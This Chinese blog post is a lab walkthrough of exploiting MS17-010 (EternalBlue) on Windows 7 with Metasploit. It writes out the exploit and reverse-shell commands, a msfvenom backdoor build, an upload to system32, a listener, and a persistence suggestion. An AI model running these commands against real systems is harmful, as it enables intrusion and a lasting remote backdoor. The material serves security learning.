利用ms17-010 遠程執行漏洞滲透Win7,並留下後門

一、環境準備

主機 kali :192.168.115.134

靶機win7x64:192.168.115.133

二、滲透

Metasploit 指令學習:https://blog.csdn.net/tan6600/article/details/46845793

這裏利用的是win7的ms17-010 遠程執行漏洞

msf > use exploit/windows/smb/ms17_010_eternalblue

msf > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) > set lhost 192.168.115.134

lhost 192.168.115.134

msf exploit(ms17_010_eternalblue) > exploit

成功拿到shell

二、後門程序

1、用msfvenom生成後門程序

參考:https://blog.csdn.net/itest_2016/article/details/76984455

新版本的msf中已經由msfvenom取代了之前的msfpayload,所以這裏我們用msfvenom來生成惡意文件。在/root下生成evil.exe文件。


msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.17.26 lport=9999 -f exe > /root/evil.exe

 

生成結束之後我們需要把這個後門傳遞到被攻陷的目標主機,實際中可能是通過webshell、上傳漏洞、先導馬等等。傳遞到目標主機之後直接運行既可以得到一個meterpreter回話。這裏我們獲得了shell利用upload命令將文件傳送到靶C:\windows\system32目錄下。注意:目標路徑要用\\。

可以看到靶機下已經接收到了後門程序文件。

此時需要現在攻擊者的主機上啓用監聽,來接收來自後門的信息。

注意:我們要斷開現在已有的連接

啓動監聽

msf > use exploit/multi/handler 
msf exploit(handler) > set lhost 192.168.115.134
msf exploit(handler) > set lport 9999
msf exploit(handler) > exploit 

被攻陷主機運行後門之後:

注意:可以將後門程序附加在開機啓動項或者進程中,這裏我們在靶機假裝不知道它是後門程序雙擊啓動evil.exe

監控端顯示有一個連接

成功得到一個meterpreter會話。

這個時候攻擊者就可以通過這個meterpreter來執行系統命令、提權、提取敏感數據、內網橫向滲透等操作。(當然我都不會2333)

可以用一個有趣的

參考:https://blog.csdn.net/nzjdsds/article/details/77916706

通過

在/root/AzitvgoJ.jpeg下可以查看到靶機的屏幕截圖

非常感謝!!!  

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章